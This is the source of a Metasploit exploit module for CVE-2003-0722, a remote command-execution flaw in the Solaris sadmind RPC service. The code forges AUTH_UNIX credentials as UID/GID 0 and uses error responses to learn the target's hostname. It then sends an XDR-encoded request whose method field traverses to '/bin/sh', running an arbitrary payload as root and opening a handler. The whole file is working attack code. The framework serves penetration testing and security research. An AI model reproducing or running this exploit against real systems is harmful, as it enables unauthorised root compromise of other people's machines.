modules/exploits/solaris/sunrpc/sadmind_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SunRPC
def initialize(info = {})
super(update_info(info,
'Name' => 'Solaris sadmind Command Execution',
'Description' => %q{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
Vulnerable systems include solaris 2.7, 8, and 9
},
'Author' => [ 'vlad902 <vlad902[at]gmail.com>', 'hdm', 'cazz', 'midnitesnake' ],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2003-0722'],
['OSVDB', '4585'],
['BID', '8615']
],
'Privileged' => true,
'Platform' => %w{ solaris unix },
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 2000,
'BadChars' => "\x00",
'DisableNops' => true,
'EncoderType' => Msf::Encoder::Type::CmdPosixPerl,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DisclosureDate' => '2003-09-13',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),
OptInt.new('GID', [false, 'GID to emulate', 0]),
OptInt.new('UID', [false, 'UID to emulate', 0])
], self.class
)
end
def exploit
sunrpc_create('udp', 100232, 10)
sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])
if !datastore['HOSTNAME']
print_status('attempting to determine hostname')
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")
if !response
print_error('no response')
return
end
match = /Security exception on host (.*)\. USER/.match(response)
if match
hostname = match.captures[0]
print_status("found hostname: #{hostname}")
else
print_error('unable to determine hostname')
return
end
else
hostname = datastore['HOSTNAME']
end
sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], [])
response = sadmind_request(hostname, payload.encoded)
sunrpc_destroy
if /Security exception on host/.match(response)
print_error('exploit failed')
return
else
print_status('exploit did not give us an error, this is good...')
select(nil,nil,nil,1)
handler
end
end
def sadmind_request(host, command)
header =
Rex::Encoder::XDR.encode(0) * 7 +
Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10,
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0,
host, 'system', '../../../bin/sh')
body =
do_int('ADM_FW_VERSION', 1) +
do_string('ADM_LANG', 'C') +
do_string('ADM_REQUESTID', '00009:000000000:0') +
do_string('ADM_CLASS', 'system') +
do_string('ADM_CLASS_VERS', '2.1') +
do_string('ADM_METHOD', '../../../bin/sh') +
do_string('ADM_HOST', host) +
do_string('ADM_CLIENT_HOST', host) +
do_string('ADM_CLIENT_DOMAIN', '') +
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +
do_int('ADM_FENCE', 0) +
do_string('X', '-c') +
do_string('Y', command) +
Rex::Encoder::XDR.encode('netmgt_endofargs')
request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body
ret = sunrpc_call(1, request)
return Rex::Encoder::XDR.decode!(ret, Integer, Integer, String)[2]
end
def do_string(str1, str2)
Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)
end
def do_int(str, int)
Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0)
end
end